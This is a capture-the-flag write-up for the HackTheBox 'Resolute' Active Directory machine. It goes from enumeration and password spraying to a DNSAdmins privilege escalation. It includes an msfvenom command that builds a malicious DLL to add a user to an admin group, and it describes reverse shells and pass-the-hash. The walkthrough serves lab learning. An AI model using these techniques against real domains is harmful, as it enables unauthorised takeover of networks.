CTF-Writeups/HackTheBox/Resolute.md
2021-12-26 01:18:24 +05:00

7.1 KiB

HackTheBox - Resolute

NMAP

PORT      STATE SERVICE      VERSION        
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-15 09:37:43Z)                      
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)               
464/tcp   open  kpasswd5?         
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0     
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)    
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found                    
9389/tcp  open  mc-nmf       .NET Message Framing        
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0             
|_http-title: Not Found                      
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49862/tcp open  unknown
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

From port 88 this tells us that this is an active directory because on this port kerberos runs which is responsible for authenticating users so knowing this will help us in our enumeration and what steps we should take

SMB/LDAP

Since smb is enabled we can try to login as anonymous user if it's disabled

now we can try to enumerate LDAP as from there we can get some information of what are user names , group names and domain name of the machine using either enum4linux-ng or windapsearch

We have the usernames just need to grep for username and then use these names against kerbrute to find which are valid domain users and we one of these users have pre-authentication disabled then we can get a user hash which we can crack

We can sort this only to grab username by using awk

So running kerbrute we found 24 usernames that are valid out of 27

Foothold

If we go back to enum4linux result we see in the description a password for marko user

But this password didn't worked for him

So next option is to just perform a passwordspray attack

We can list shares on smb

The NETLOGON share seems to have nothing in it

So I tried to see if I can kerberoast a user which is assoiciated with any SPNs but doesn't seem if there were any accounts like that

Then I realized that I didn't check winrm

And we can actually use it to get a remote session using evil-winrm

So to enumrate AD , we have two options either running sharphound powershell script or python bloodhound injestor

Import the json files that this script generates and after that search the username so that we can mark it as pwned and see if we can find a path to higher targets by running the pre-built query

Running the query we don't see anything interesting that we can do with this user

But if we look at ryan user , he's in the group Contractors

And if we further explore this group , that is a member of DNSAdminsGroup

Privilege Escalation (ryan)

Getting on the machine through evil-winrm we can see a hidden directory called PSTranscripts through dir -Force

We can find a text file by going into this directory

Reading this file we will be able to get the password for ryan

Privilege Escalation (Administrator)

We know that ryan is a member of contractors group and that group is a member of DNSAdmins group so that makes ryan a member of that group

This can lead to privilege escalation to SYSTEM user as having the permission to control dns service we can load a malicious dll file by generating it through msfvenom and hosting it through smb share and then loading it with dnscmd then stopping the dns service with sc.exe stop dns and restarting it with sc.exe start dns to start dnsservice with our malicious dll file

Generating the dll file

Using impacket's smbserver to start smbserver

Now there was an issue with this box , don't know if it's the same with other users, when I was following this article for abusing DNSAdmins group it wouldn't give me the reverse shell neither it would execute commands from the payload msfvenom -p windows/x64/exec cmd='net group "Administrator" melanie /add' -f dll > dns.dll

Also when we download the dll on the machine it would be removed under a minute so we needed to be quick , so the way I got SYSTEM was , I stopped the dns service first then loaded the dll then started the dns service and saw the response on smbserver and got a shell on netcat

To get a proper shell we can now just add ryan to Domain Admins group or local group Administrators

We can verify it with net user ryan

Again , we need to be quick to dump hashes and perform pass the hash attack because it will revert back the changes

References